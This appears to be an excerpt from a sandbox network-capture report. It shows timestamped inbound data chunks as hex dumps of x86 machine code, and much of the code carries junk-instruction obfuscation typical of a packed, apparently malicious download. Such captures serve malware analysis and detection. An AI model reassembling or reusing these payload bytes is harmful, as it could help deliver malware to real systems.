2022-11-26 10:17:52 UTC	816	IN	Data Raw: 8a e0 1f 31 eb 0f 50 e6 92 28 6c c8 43 f1 fa 99 b9 59 61 b2 c0 c3 85 d2 eb 05 8e 9c fe 45 af 74 17 55 89 e5 53 8b 48 10 31 c0 89 c3 c1 e3 04 3b 54 19 0c 74 0b 40 eb f2 b8 00 80 ff ff 50 58 c3 5b 5d c3 89 c2 85 c0 52 5a 74 3d ff 08 75 39 8b 40 0c eb 19 5e 35 d4 cb 1b f1 28 89 1d 6e 1a e0 d9 38 1c 1f bb 3d a1 76 4e e7 b8 77 73 51 b9 26 7e 00 00 b9 d4 4b 00 00 b9 7d 78 00 00 b9 95 7f 00 00 59 e9 77 a5 ff ff c3 85 c0 0f 84 d0 00 00 00 55 89 e5 57 56 53 89 d3 83 ec 1c 85 d2 50 b8 1b 41 00 00 b8 f1 14 00 00 b8 d6 43 00 00 b8 9b 35 00 00 58 0f 84 9a 00 00 00 89 c7 8b 02 31 f6 89 45 e4 50 58 3b 75 e4 eb 0f 5d 89 96 8d 15 93 3c 5e b9 91 b4 44 19 f7 48 7d 6e 6b c6 14 8b 54 03 0c 50 b8 ad 77 00 00 58 89 f8 50 90 eb 19 ea bd c7 9b 0d b9 5c c3 26 c1 55 ce 68 16 0c 2a Data Ascii: 1P(lCYaEtUSH1;Tt@PX[]RZt=u9@^5(n8=vNwsQ&~K}xYwUWVSPAC5X1EPX;u]<^DH}nkTPwXP\&Uh*
2022-11-26 10:17:52 UTC	832	IN	Data Raw: 23 e4 20 bd ef 48 38 2f 87 bc e9 a0 12 52 51 b9 d2 16 00 00 59 ba 6b 50 00 00 ba c7 2e 00 00 ba 93 7e 00 00 ba ce 58 00 00 5a 8a 46 2b eb 0f 75 d3 a2 67 9b d1 e9 15 2e a5 ed c6 0b c4 18 84 c0 0f 85 f3 00 00 00 8b 7e 30 85 ff 0f 84 67 01 00 00 eb 05 21 0c cc 3b 76 51 59 83 bb 10 02 00 00 00 eb 05 ed 4f a6 32 41 75 74 8b 47 10 8b 4f 0c 85 c0 74 05 89 48 0c eb 58 51 eb 0f f9 8a 3f 81 19 12 17 1e 72 61 6f 6b 2e 14 25 b9 15 62 00 00 b9 e0 1e 00 00 b9 8f 28 00 00 51 59 b9 7b 5d 00 00 59 85 c9 74 0c 50 b8 12 6b 00 00 58 8b 51 08 eb 03 8b 57 08 8b 46 3c eb 0f 5f e5 76 6d 2e f9 d8 69 91 fa e7 c0 b9 d3 c7 83 c0 38 e8 7e fb ff ff 8b 47 0c 85 c0 74 06 8b 57 10 89 50 10 8b 57 1c 89 d8 e8 57 0f 00 00 8b 57 20 89 d8 e8 4d 0f 00 00 eb 19 53 28 10 60 76 68 2f 7b 1f 5e 18 Data Ascii: # H8/RQYkP.~XZF+ug.~0g!;vQYO2AutGOtHXQ?raok.%b(QY{]YtPkXQWF<_vm.i8~GtWPWWW MS(`vh/{^
2022-11-26 10:17:52 UTC	848	IN	Data Raw: 8d 9c 00 00 00 8b 54 c7 24 8b 4d e0 90 83 3c 91 00 79 11 0f bf 4b 20 39 d1 75 06 83 7d 08 00 75 03 40 eb d8 eb 19 04 11 e3 12 e7 b3 f6 ef c5 88 1a 07 4e aa 04 af 90 f5 32 3f 85 db 02 28 e9 50 b8 94 41 00 00 58 8b 47 08 89 44 24 04 eb 0f 13 aa f2 43 1e 68 75 33 84 6e 2c ae 54 02 59 8b 03 89 04 24 e8 ba 24 fb ff 51 b9 73 43 00 00 b9 75 00 00 00 59 c7 45 e4 01 00 00 00 85 c0 b8 02 00 00 00 eb 19 1f e9 b8 23 1c 1d b3 88 8b 5d 7f fa 89 a2 7c 32 45 72 72 24 b7 35 fa 83 8a 90 0f 44 f0 8b 7f 04 e9 43 ff ff ff 89 d8 e8 58 28 fe ff 89 c7 85 ff 74 2b 8b 45 08 8b 4d e0 89 fa 89 04 24 89 d8 e8 33 29 fe ff 85 c0 90 74 0d 80 7f 1a 00 75 1a c7 45 e4 01 00 00 00 51 59 8b 7f 0c eb d1 83 7d e4 00 0f 84 86 fe ff ff eb 05 be 02 00 00 00 83 c4 2c 89 f0 5b 5e 5f 5d c3 85 c0 74 Data Ascii: T$M<yK 9u}u@N2?(PAXGD$Chu3n,TY$$QsCuYE#]\|2Err$5DCX(t+EM$3)tuEQY},[^_]t
2022-11-26 10:17:52 UTC	864	IN	Data Raw: cf c0 58 80 f1 7b d3 92 f8 f9 64 ab a8 de a0 72 50 58 eb 05 5e 5f 4e 63 68 eb 0f 63 6b 7e 7d 9d b3 0d bf e7 f7 07 b4 5c 9f 9f eb 19 86 1e 28 a6 aa 57 c5 ea b7 fe 97 50 6c 48 45 22 96 7c d8 95 5a 90 6e 04 e0 eb 05 15 14 eb 4d cb 50 b8 ca 1a 00 00 50 58 58 50 b8 4a 55 00 00 b8 8d 67 00 00 58 eb 19 64 c5 ac 18 27 33 fe 1c 82 38 b1 61 24 11 44 f2 df 1d a7 a7 89 aa d1 de 3c 90 8b 11 89 54 24 04 8b 00 89 04 24 e8 a6 85 ff ff 52 ba e5 18 00 00 ba 3f 02 00 00 ba 07 3b 00 00 ba d1 6b 00 00 5a 52 50 b8 8c 12 00 00 b8 f1 28 00 00 58 ba 81 13 00 00 ba f1 64 00 00 5a e9 1c 01 00 00 8b 11 e9 07 01 00 00 8b 11 89 54 24 04 eb 19 68 4d 7b 22 f4 49 10 68 9f 96 c5 d3 d7 86 b2 37 78 32 33 82 b1 c8 ba 75 11 50 b8 c9 29 00 00 58 8b 00 89 04 24 e8 c4 86 ff ff e9 de 00 00 00 8b Data Ascii: X{drPX^_Nchck~}\(WPlHE"\|ZnMPPXXPJUgXd'38a$D<T$$R?;kZRP(XdZT$hM{"Ih7x23uP)X$
2022-11-26 10:17:52 UTC	880	IN	Data Raw: f9 ff ff c9 c3 55 89 e5 57 56 53 83 ec 1c 8b 4d 08 8b 75 0c 8b 19 8b 43 14 8b 78 78 89 f8 99 39 f7 89 d0 1b 45 10 73 16 89 0c 24 eb 05 5c de 9d 53 57 e8 91 ff ff ff b8 12 00 00 00 eb 2b 89 d8 e8 5d a2 fe ff 85 f6 b8 00 00 00 00 c6 43 12 01 0f 48 f0 66 c7 43 10 10 04 c7 43 0c 00 00 00 00 89 33 c7 43 08 00 00 00 00 83 c4 1c 5b 5e 5f 5d c3 55 ba 00 00 00 00 89 e5 83 ec 18 8b 45 0c 85 c0 0f 48 c2 89 44 24 04 c1 f8 1f 89 44 24 08 8b 45 08 89 04 24 e8 6b ff ff ff c9 c3 85 c0 74 2f 55 0f b6 c9 89 e5 53 83 ec 14 8b 5d 08 89 4c 24 08 89 5c 24 0c c7 04 24 ff ff ff ff c7 44 24 04 ff ff ff ff e8 83 f8 ff ff 83 c4 14 5b 5d c3 c3 55 89 e5 53 89 c3 83 ec 14 8b 00 80 78 57 00 75 38 0f b7 83 90 00 00 00 c7 44 24 08 01 00 00 00 c7 04 24 ff ff ff ff 0f af c1 c7 44 24 04 ff Data Ascii: UWVSMuCxx9Es$\SW+]CHfCC3C[^_]UEHD$D$E$kt/US]L$\$$D$[]USxWu8D$$D$
2022-11-26 10:17:52 UTC	896	IN	Data Raw: ff 8b 45 bc 8b 54 03 10 85 d2 74 07 89 f0 e8 f7 47 ff ff ff 45 c0 eb 9f 83 7d c4 00 74 14 8b 45 c4 3b 86 0c 01 00 00 75 09 8b 40 08 89 86 0c 01 00 00 83 c4 4c 5b 5e 5f 5d c3 55 b8 01 00 00 00 89 e5 57 56 53 83 ec 0c 8b 7d 0c f7 47 04 00 00 20 04 75 42 8b 77 20 b8 02 00 00 00 85 f6 74 36 8b 45 08 31 db 8b 50 18 39 1e 7e 1d 6b c3 48 8b 4a 0c 39 4c 06 18 75 0e 8b 4c 06 10 8b 45 08 8b 00 e8 b2 2c fd ff 43 eb df 8b 45 08 8b 57 40 e8 dc fe ff ff 31 c0 83 c4 0c 5b 5e 5f 5d c3 55 b8 01 00 00 00 89 e5 83 ec 08 8b 55 0c f7 42 04 00 00 20 04 75 0d 8b 45 08 8b 52 40 e8 b0 fe ff ff 31 c0 c9 c3 55 89 e5 57 56 53 83 ec 1c 8b 45 08 8b 18 8b 43 24 89 45 e4 85 c0 0f 85 cb 00 00 00 8b 45 0c f7 40 04 00 00 20 04 0f 85 c4 00 00 00 8b 78 1c 31 f6 85 ff 75 22 8b 45 0c 8b 78 20 Data Ascii: ETtGE}tE;u@L[^_]UWVS}G uBw t6E1P9~kHJ9LuLE,CEW@1[^_]UUB uER@1UWVSEC$EE@ x1u"Ex
2022-11-26 10:17:52 UTC	912	IN	Data Raw: c4 2c 5b 5e 5f 5d c3 55 89 e5 57 56 53 83 ec 2c 8b 58 04 89 55 e0 89 4d dc 8b 7b 0c 85 ff 74 42 8b 00 e8 0d f8 ff ff 8b 53 08 8b 73 4c 89 45 e4 31 c0 85 d2 74 02 8b 02 01 c6 31 db 39 1f 7e 22 8b 45 dc 8b 4d e0 ba 5e 00 00 00 01 d8 89 44 24 04 8d 04 1e 43 89 04 24 8b 45 e4 e8 ab ef ff ff eb da 83 c4 2c 5b 5e 5f 5d c3 55 89 e5 57 89 cf 56 89 d6 53 83 ec 5c 89 45 e0 8b 45 08 8b 5d 0c 89 45 d8 8b 45 e0 8b 40 08 89 45 e4 8b 41 18 89 45 bc 8b 45 e0 8b 40 38 89 45 dc 48 89 45 b0 8b 45 e0 8b 4d b0 89 48 38 8b 07 89 45 d0 0f b6 03 88 45 c7 89 45 b8 8b 43 04 89 45 c8 8b 42 1c 89 45 ac 8b 47 10 85 c0 74 29 89 04 24 8b 4f 0c ba 0a 00 00 00 8b 45 e4 e8 c5 f6 ff ff 8b 55 bc 8b 45 e4 e8 d2 fb ff ff 8b 57 10 8b 45 e4 e8 9e d9 ff ff 8b 47 08 89 45 cc 8a 45 c7 83 e8 09 3c Data Ascii: ,[^_]UWVS,XUM{tBSsLE1t19~"EM^D$C$E,[^_]UWVS\EE]EE@EAEE@8EHEEMH8EEECEBEGt)$OEUEWEGEE<
2022-11-26 10:17:52 UTC	928	IN	Data Raw: c3 55 89 e5 53 89 c3 83 ec 14 85 d2 74 26 8b 08 8b 81 08 02 00 00 8b 91 0c 02 00 00 03 81 00 02 00 00 13 91 04 02 00 00 31 c9 39 c1 19 d1 7c 0e 31 c0 eb 38 89 d0 3b 53 40 1b 53 44 7d 2e c7 43 24 13 03 00 00 c6 83 92 00 00 00 02 c7 44 24 04 52 3b 64 00 89 1c 24 e8 74 ff ff ff 0f be 83 94 00 00 00 c1 f8 1f 25 12 03 00 00 40 83 c4 14 5b 5d c3 55 89 e5 83 ec 08 8b 55 0c 8b 45 08 8d 4d 10 e8 b8 57 ff ff c9 c3 55 89 e5 57 56 53 89 d3 83 ec 6c 89 45 c4 8b 42 2c 89 4d b4 89 45 b0 8b 45 c4 c7 45 d4 00 00 00 00 8b 80 94 01 00 00 89 45 bc 83 7d bc 00 74 3a 8b 45 bc 39 58 04 75 2a 8b 03 c7 44 24 04 70 3b 64 00 89 44 24 08 8b 45 c4 89 04 24 e8 99 ff ff ff 8b 4d 0c c7 45 c0 06 00 00 00 89 01 e9 a1 02 00 00 8b 45 bc 8b 40 08 eb bd 8b 13 8b 45 c4 8b 7b 30 e8 ce 5e ff ff Data Ascii: USt&19\|18;S@SD}.C$D$R;d$t%@[]UUEMWUWVSlEB,MEEEE}t:E9Xu*D$p;dD$E$MEE@E{0^
2022-11-26 10:17:52 UTC	944	IN	Data Raw: eb 24 39 55 90 89 c2 19 ca 7c 1b 8b 4d 90 89 44 24 0c c7 44 24 04 3f 40 64 00 89 4c 24 08 89 3c 24 e8 f0 f9 ff ff 8b 45 d0 8b 55 d4 c7 45 a4 00 00 00 00 89 45 c0 89 55 c4 8b 45 dc 0f b7 55 e0 39 d0 76 51 8b 4d a0 29 d0 31 d2 8d 44 08 fb 8b 4d 98 f7 75 94 89 45 90 0f b7 45 e2 8b 44 01 fc 0f c8 89 45 94 8b 45 a8 80 78 11 00 74 15 8b 45 b4 8b 55 94 b9 03 00 00 00 89 04 24 89 f8 e8 1a fa ff ff 8b 45 90 8b 4d 94 31 d2 89 04 24 89 f8 e8 0d fb ff ff 8b 45 cc 80 78 08 00 75 5f 8b 45 98 8b 10 8b 45 a8 80 78 11 00 0f ca 74 18 8b 45 b4 b9 05 00 00 00 89 55 a4 89 04 24 89 f8 e8 da f9 ff ff 8b 55 a4 8b 4d c0 8b 5d c4 89 f8 89 0c 24 8d 4d c0 89 5c 24 04 e8 6f fc ff ff c7 45 a4 00 00 00 00 89 c3 39 45 b0 74 29 c7 44 24 04 57 40 64 00 89 3c 24 e8 1b f9 ff ff eb 17 0f b7 Data Ascii: $9U\|MD$D$?@dL$<$EUEEUEU9vQM)1DMuEEDEExtEU$EM1$Exu_EExtEU$UM]$M\$oE9Et)D$W@d<$
2022-11-26 10:17:52 UTC	960	IN	Data Raw: 85 5f 06 00 00 c7 44 24 08 5c 00 00 00 8b 00 c7 04 24 23 43 64 00 89 44 24 04 e8 cf f5 fd ff 85 c0 0f 84 3d 06 00 00 8b 45 dc 8b 50 3c 8b 45 cc e8 e1 bf fd ff 8b 75 cc ba 1c 00 00 00 89 45 b8 c1 e0 04 03 46 10 8b 00 c7 04 24 00 00 00 00 89 44 24 04 8b 45 dc 8b 08 89 f8 e8 a2 4c ff ff 85 c0 0f 85 fd 05 00 00 8b 45 e0 8b 55 b8 40 89 45 a4 8b 45 e0 83 c0 02 89 45 c8 8b 45 e0 83 c0 03 89 45 88 8b 45 e0 83 c0 04 89 45 d8 8b 45 e0 83 c0 05 89 45 84 8b 45 e0 83 c0 06 89 45 a0 8b 45 e0 83 c0 07 89 45 8c 8b 45 e0 83 c0 08 89 45 9c 8b 45 dc 8b 48 14 8b 00 c7 04 24 00 00 00 00 89 44 24 04 89 f8 e8 e1 26 ff ff 8b 45 ac c7 44 24 04 70 00 00 00 8b 4d b8 8b 55 ac 40 89 45 d0 8b 45 ac 83 c0 02 39 47 28 0f 4d 47 28 89 47 28 8b 45 dc 89 04 24 89 f8 e8 27 f8 ff ff 8b 45 dc Data Ascii: _D$\$#CdD$=EP<EuEF$D$ELEU@EEEEEEEEEEEEEEEEH$D$&ED$pMU@EE9G(MG(G(E$'E
2022-11-26 10:17:52 UTC	976	IN	Data Raw: fc ff 8b 53 28 66 8b 4d a2 f6 c6 40 8d 7c 01 ce 8a 4d 98 74 0a 66 8b 43 2a 66 39 45 a2 7f 13 66 8b 45 a2 80 e6 01 74 0a 66 83 7d a2 0a 7e 03 83 e8 0a 98 88 4d 98 e8 0d b5 fd ff 8a 4d 98 01 c7 66 89 3e 0f bf 16 0f bf 45 be 88 8d 6c ff ff ff e8 e1 56 fd ff 66 8b 75 be 8a 8d 6c ff ff ff 83 c0 05 66 89 75 98 66 89 45 be eb 0b 66 8b 45 be 83 e8 02 66 89 45 98 83 7d a4 00 75 19 8b 45 d0 f6 40 2f 02 74 10 66 8b 45 82 66 83 6d be 0a 83 e8 1e 66 89 45 94 8b 45 b4 31 f6 3b 75 b8 74 26 8b bd 74 ff ff ff 3b 78 04 75 15 8b bd 70 ff ff ff 3b 38 75 0b 89 ca 32 50 16 0f 89 b8 02 00 00 46 83 c0 20 eb d5 8b 7d b8 39 7d c8 0f 8f aa 03 00 00 66 8b 75 be 66 39 75 a0 0f 8d 88 03 00 00 8b 45 d0 8b 40 3c e9 cf fd ff ff ff 85 7c ff ff ff 83 45 cc 20 e9 ae fd ff ff 8b 45 d4 8b 4d Data Ascii: S(fM@\|MtfC*f9EfEtf}~MMf>ElVfulfufEfEfE}uE@/tfEfmfEE1;ut&t;xup;8u2PF }9}fuf9uE@<\|E EM
2022-11-26 10:17:52 UTC	992	IN	Data Raw: ac 06 00 31 d2 40 01 c6 11 d7 43 eb e3 89 34 24 89 7c 24 04 e8 0c f3 ff ff 89 c3 85 c0 74 45 c7 00 00 00 00 00 8b 55 08 83 c3 04 31 f6 89 d8 e8 61 96 fc ff 39 75 e4 7e 0e 8b 4d 18 8b 14 b1 46 e8 50 96 fc ff eb ed c6 00 00 8d 48 01 8b 55 0c 89 c8 e8 3e 96 fc ff 8b 55 10 e8 36 96 fc ff 66 c7 00 00 00 83 c4 2c 89 d8 5b 5e 5f 5d c3 55 89 e5 56 53 8b 75 0c 8b 5d 08 e8 be e2 ff ff 85 c0 75 14 85 f6 0f 49 c6 99 89 d1 89 c2 89 d8 5b 5e 5d e9 09 1c fe ff 5b 31 c0 5e 5d c3 55 89 e5 57 56 53 83 ec 0c 8b 5d 08 8b 75 0c 8b 7d 10 e8 89 e2 ff ff 85 c0 75 12 83 c4 0c 89 f2 89 f9 89 d8 5b 5e 5f 5d e9 d6 1b fe ff 83 c4 0c 31 c0 5b 5e 5f 5d c3 55 89 d1 89 e5 57 31 ff 56 89 d6 53 89 c3 83 ec 2c 8b 40 08 8b 53 0c 39 c1 89 f9 19 d1 73 06 01 c0 11 d2 eb 0a 83 c0 0a 83 d2 00 01 Data Ascii: 1@C4$\|$tEU1a9u~MFPHU>U6f,[^_]UVSu]uI[^][1^]UWVS]u}u[^_]1[^_]UW1VS,@S9s
2022-11-26 10:17:52 UTC	1008	IN	Data Raw: b6 74 1a 02 89 f2 88 55 cb f6 86 20 f8 64 00 08 74 77 0f be 45 cc 8d 4b 03 e8 0a 62 f9 ff 0f b6 f0 0f be 45 cb c1 e6 04 e8 fb 61 f9 ff 0f b6 c0 01 f0 0f 85 d0 00 00 00 8b 45 e4 8a 04 08 3c 23 75 11 89 cb 8b 45 e4 8a 04 18 3c 23 75 81 e9 cd 00 00 00 84 c0 74 eb 83 7d e0 00 75 08 3c 3f 0f 84 af 00 00 00 83 7d e0 01 75 0b 3c 3d 74 d3 3c 26 74 cf 41 eb c2 83 7d e0 02 75 f7 3c 26 75 f3 c7 45 e0 02 00 00 00 eb b9 83 7d e0 01 75 3d 3c 26 74 04 3c 3d 75 71 8b 75 dc 89 fa 80 7c 3e ff 00 75 1b 8b 45 e4 8a 04 08 84 c0 74 95 3c 23 74 91 8b 45 e4 80 7c 08 ff 26 74 87 41 eb e5 3c 26 75 34 8b 45 dc 47 c6 04 10 00 eb 3a 83 7d e0 00 75 04 3c 3f 74 29 83 7d e0 02 75 2c 3c 26 0f 94 c2 84 d2 ba 01 00 00 00 0f 44 55 e0 89 55 e0 b2 00 0f 45 c2 eb 12 c7 45 e0 02 00 00 00 eb 07 Data Ascii: tU dtwEKbEaE<#uE<#ut}u<?}u<=t<&tA}u<&uE}u=<&t<=uqu\|>uEt<#tE\|&tA<&u4EG:}u<?t)}u,<&DUUEE
2022-11-26 10:17:52 UTC	1024	IN	Data Raw: 47 18 89 43 38 e9 6d 03 00 00 83 bb e8 00 00 00 00 75 0c 8b 43 44 83 38 00 0f 84 58 03 00 00 85 d2 74 2d 6b c2 30 8b 53 64 8d 74 02 d0 85 f6 74 1f 8b 46 14 e8 3c 1b fd ff 89 45 d0 85 c0 0f 85 2b 03 00 00 c7 45 d4 07 00 00 00 e9 27 03 00 00 c7 45 d0 00 00 00 00 8b 43 20 31 f6 89 43 1c 8a 43 0c 88 43 13 85 f6 0f 85 c8 00 00 00 8b 83 e8 00 00 00 89 45 c8 85 c0 0f 84 b7 00 00 00 8b 43 20 89 43 1c 8b 45 c8 80 78 2c 00 74 75 8b 40 44 8b 7d c8 b9 0c 00 00 00 89 45 d0 8b 45 c8 8b 57 20 83 c0 34 89 c7 8b 32 8b 45 c8 f3 a5 8b 40 44 89 45 c0 8d 70 22 8d 46 df 39 45 d0 8b 45 c8 72 34 83 7d d4 00 75 2e 89 f1 8b 40 20 c1 e9 0c 75 07 8b 00 8d 04 b0 eb 0e 8b 04 88 89 f2 81 e2 ff 0f 00 00 8d 04 90 8b 10 89 d8 46 e8 47 b8 fe ff 89 45 d4 eb c1 8b 7d d0 3b 78 44 74 05 e8 9c Data Ascii: GC8muCD8Xt-k0SdttF<E+E'EC 1CCCEC CEx,tu@D}EEW 42E@DEp"F9EEr4}u.@ uFGE};xDt
2022-11-26 10:17:52 UTC	1040	IN	Data Raw: 7d e8 8d 45 a8 e8 ee 81 fa ff 0f b7 c0 83 c0 02 eb d8 3b 7d a8 7c 0b 8d 43 01 89 85 d0 fe ff ff eb 1b 31 c0 85 db 74 07 8b 84 9d 3c ff ff ff 39 c7 7f 0a b8 fb 29 01 00 e9 c9 00 00 00 43 83 c6 04 3b 9d d0 fe ff ff 0f 8c c5 fe ff ff 8b 85 d0 fe ff ff 48 89 85 98 fe ff ff 89 c3 85 db 0f 84 11 01 00 00 8b 84 9d 64 ff ff ff 8b 94 9d 3c ff ff ff 8b bc 9d 68 ff ff ff 89 85 ec fe ff ff 8d 72 ff 8d 45 a8 2b 95 dc fe ff ff 89 95 9c fe ff ff e8 62 81 fa ff 31 c0 39 9d 98 fe ff ff 8b 95 9c fe ff ff 0f 95 c0 01 c0 89 85 94 fe ff ff 8d 04 12 89 85 9c fe ff ff 89 f2 8d 45 a8 e8 36 81 fa ff 85 ff 74 77 80 bd b0 fe ff ff 00 74 47 8b 85 ec fe ff ff 89 bc 9d 68 ff ff ff 8b 94 9d 3c ff ff ff 89 84 9d 64 ff ff ff 31 c0 83 fb 01 74 07 8b 84 9d 38 ff ff ff 4b 39 c2 0f 8f 5b ff Data Ascii: }E;}\|C1t<9)C;Hd<hrE+b19E6twtGh<d1t8K9[
2022-11-26 10:17:52 UTC	1056	IN	Data Raw: 00 00 8b 45 08 89 78 1c 8b 45 08 8b 00 85 c0 74 24 8b 40 0c 89 04 24 e8 b9 fd f6 ff eb 17 83 7d c4 00 bf 65 00 00 00 74 d9 eb b0 83 7d c4 00 75 aa 31 ff eb cd 8b 45 08 8b 40 18 e8 75 20 fc ff 8b 45 08 8b 40 14 8b 40 0c 89 04 24 e8 84 fd f6 ff 83 c4 5c 89 f8 5b 5e 5f 5d c3 55 89 e5 57 56 53 bb 08 00 00 00 81 ec fc 00 00 00 80 78 2e 00 89 95 0c ff ff ff 89 8d 2c ff ff ff c7 85 64 ff ff ff 00 00 00 00 0f 85 da 09 00 00 b9 01 00 00 00 ba 01 00 00 00 89 c6 e8 41 b7 fc ff 89 c3 8b 85 2c ff ff ff 89 85 40 ff ff ff 85 db 0f 85 96 00 00 00 c6 46 2d 01 c7 85 40 ff ff ff 00 00 00 00 85 c0 74 4e 8b 4d 0c 8b 55 08 c7 44 24 04 01 00 00 00 89 f0 c7 04 24 00 00 00 00 e8 41 b7 fc ff 85 c0 75 12 8b 85 2c ff ff ff c6 46 2c 01 89 85 40 ff ff ff eb 1c 83 f8 05 74 10 8b bd 2c Data Ascii: ExEt$@$}et}u1E@u E@@$\[^_]UWVSx.,dA,@F-@tNMUD$$Au,F,@t,
2022-11-26 10:17:52 UTC	1072	IN	Data Raw: 08 8b 40 18 85 c0 0f 85 a7 01 00 00 b8 10 00 00 00 31 d2 bb 0a 0c 00 00 e8 48 55 fc ff 89 45 d4 85 c0 0f 84 47 04 00 00 8b 45 08 8b 40 1c e8 d1 4f fb ff 31 d2 89 c3 8d 40 79 e8 26 55 fc ff 89 c6 85 c0 75 15 8b 45 d4 bb 0a 0c 00 00 89 04 24 e8 a5 8e fb ff e9 15 04 00 00 8b 7d 08 8d 40 68 83 c3 0f 89 46 04 8b 57 1c c7 44 24 08 fb 4f 64 00 89 44 24 04 89 54 24 0c 89 1c 24 e8 74 ca fd ff a1 10 c1 65 00 89 04 24 e8 b3 b0 f6 ff 8b 0d 0c c1 65 00 89 cf 85 ff 74 20 8b 56 04 8b 47 04 89 4d d0 e8 32 99 f7 ff 89 c3 85 c0 0f 84 4a 03 00 00 8b 7f 64 8b 4d d0 eb dc 80 3d c4 cb 63 00 00 c7 45 e0 00 00 00 00 89 35 0c c1 65 00 c7 46 10 ff ff ff ff 89 4e 64 74 16 c7 04 24 00 00 00 00 e8 b5 a7 fe ff 89 06 85 c0 0f 84 75 03 00 00 8b 45 08 c7 44 24 08 00 00 00 00 c7 44 24 04 Data Ascii: @1HUEGE@O1@y&UuE$}@hFWD$OdD$T$$te$et VGM2JdM=cE5eFNdt$uED$D$
2022-11-26 10:17:52 UTC	1088	IN	Data Raw: ff ff ff e8 f4 83 00 00 89 c3 85 c0 0f 84 82 d2 ff ff 0f b6 78 2f 8b 8d 48 ff ff ff 89 f2 8b 85 54 ff ff ff 89 3c 24 e8 f1 6b 00 00 85 ff 74 23 8b 85 48 ff ff ff 8b 40 28 85 c0 74 16 8b 48 0c 8b 40 10 89 fa 89 04 24 8b 85 54 ff ff ff e8 ca 52 fc ff 85 f6 74 18 89 34 24 8b 85 4c ff ff ff b9 01 00 00 00 ba 47 00 00 00 e8 32 37 fd ff 80 bd 24 ff ff ff 00 74 3c f6 43 30 04 74 36 80 7b 2d 00 74 30 0f b6 43 2c 83 e8 01 72 19 6b d0 60 8b 8c 13 48 03 00 00 f6 41 2c 04 74 eb 8b 94 13 08 03 00 00 eb 03 8b 53 20 8b 85 4c ff ff ff e8 05 3c fd ff 89 d8 e8 5e bf 00 00 8b 85 54 ff ff ff 8b 95 48 ff ff ff 8b 40 08 e8 2b 3b fd ff 8b 85 20 ff ff ff c7 44 24 0c 10 00 00 00 c7 45 88 00 00 00 00 89 44 24 08 8b 85 08 ff ff ff 89 44 24 04 8b 85 54 ff ff ff 89 04 24 e8 79 14 00 Data Ascii: x/HT<$kt#H@(tH@$TRt4$LG27$t<C0t6{-t0C,rk`HA,tS L<^TH@+; D$ED$D$T$y
2022-11-26 10:17:52 UTC	1104	IN	Data Raw: 75 07 66 83 7f 0c 40 75 13 8b 57 14 8b 85 78 ff ff ff e8 f0 87 fb ff 09 45 a4 09 d6 ff 45 94 83 c7 30 eb c5 c7 45 a4 00 00 00 00 31 f6 8b 7d a4 21 75 88 21 7d 8c eb 67 66 8b 4b 0a f6 c1 08 89 8d 70 ff ff ff 75 66 8b 45 b0 8b 53 14 05 f0 01 00 00 89 85 78 ff ff ff e8 aa 87 fb ff 8b 8d 70 ff ff ff 89 c7 89 d6 80 e1 02 74 1c 8b 4d c0 6b 43 10 30 03 41 18 8b 50 14 8b 85 78 ff ff ff e8 83 87 fb ff 09 c7 09 d6 21 7d 8c 21 75 88 f6 85 7c ff ff ff 02 74 08 21 7d a4 21 75 94 eb 0e c7 45 a4 00 00 00 00 c7 45 94 00 00 00 00 ff 8d 74 ff ff ff 83 c3 30 e9 4a fe ff ff 8b 45 c0 8b 7d 8c 89 b8 a0 01 00 00 8b 7d 88 89 b8 a4 01 00 00 8b 45 90 66 c7 40 0c 00 02 c7 40 14 ff ff ff ff 89 f8 0b 45 8c 0f 84 7d 01 00 00 8b 45 d0 c6 40 09 01 8b 45 c0 83 78 0c 02 0f 85 69 01 00 00 Data Ascii: uf@uWxEE0E1}!u!}gfKpufESxptMkC0APx!}!u\|t!}!uEEt0JE}}Ef@@E}E@Exi
2022-11-26 10:17:52 UTC	1120	IN	Data Raw: 04 24 00 00 00 00 89 44 24 04 8b 45 bc e8 f9 af fc ff eb 0a 8b 45 c8 c7 40 48 00 00 00 00 8b 45 c4 89 44 24 04 8b 45 cc 8b 00 89 04 24 e8 26 d1 fa ff 8b 45 c8 8b 40 50 f6 40 2e 20 74 09 8b 45 b0 f6 40 0d 08 75 0b 8b 55 b0 8b 45 c8 e8 5d 05 fa ff 8b 45 10 83 c4 6c 5b 5e 5f 5d c3 55 89 e5 57 56 53 83 ec 4c 89 45 e0 8b 40 08 89 55 d4 8b 5d e0 89 45 e4 8b 42 50 89 4d c4 66 8b 70 32 8b 50 20 89 45 d8 8b 45 e0 8b 40 2c 89 45 d0 8d 78 01 8b 45 d8 0f b7 40 18 89 45 cc 03 45 08 89 45 c0 8b 45 d0 03 45 c0 89 43 2c 8b 03 0f b7 de e8 3a ac fc ff 89 c2 8b 45 e0 8b 00 e8 0d 5f fc ff 89 45 dc 66 85 f6 75 07 89 de e9 dc 00 00 00 8b 45 d4 31 c9 ba 4b 00 00 00 8b 40 08 89 3c 24 89 45 c8 8d 44 3b ff 89 44 24 04 8b 45 e4 e8 19 af fc ff 83 7d c4 01 8b 4d c8 19 d2 8b 45 e4 83 Data Ascii: $D$EE@HED$E$&E@P@. tE@uUE]El[^_]UWVSLE@U]EBPMfp2P EE@,ExE@EEEEEC,:E_EfuE1K@<$ED;D$E}ME
2022-11-26 10:17:52 UTC	1136	IN	Data Raw: 59 47 fb ff 89 d8 e8 fa 17 f9 ff fe 4b 1a 81 c4 ac 00 00 00 5b 5e 5f 5d c3 55 89 e5 57 89 c7 56 53 83 ec 4c 8b 00 0f b6 5f 2c c7 45 c8 00 00 00 00 89 45 e0 8b 40 08 89 45 e4 8b 47 04 89 45 c4 8b 45 e0 8b 00 89 45 d0 8b 45 e4 8b 40 6c 89 45 b8 8d 43 ff 6b db 60 89 45 d4 01 fb 83 7d d4 ff 0f 84 80 04 00 00 8b b3 d0 02 00 00 85 f6 74 42 8b 93 b0 02 00 00 8b 45 e4 e8 12 5a fc ff 8b 45 e4 8b 4e 08 ba 43 00 00 00 c7 83 b0 02 00 00 00 00 00 00 8b 40 6c 89 46 10 c7 44 24 04 01 00 00 00 8b 46 0c 89 04 24 8b 45 e4 e8 5c 6f fc ff ff 45 c8 8b 83 e8 02 00 00 80 bb d5 02 00 00 b8 89 45 dc 0f 84 79 01 00 00 31 f6 80 7f 2f 02 0f 85 df 00 00 00 0f b6 47 2c 48 3b 45 d4 0f 85 d1 00 00 00 8b 45 dc f6 40 2d 02 0f 84 c4 00 00 00 8b 40 20 80 78 38 00 0f 89 b7 00 00 00 8b 75 dc Data Ascii: YGK[^_]UWVSL_,EE@EGEEEE@lECk`E}tBEZENC@lFD$F$E\oEEy1/G,H;EE@-@ x8u
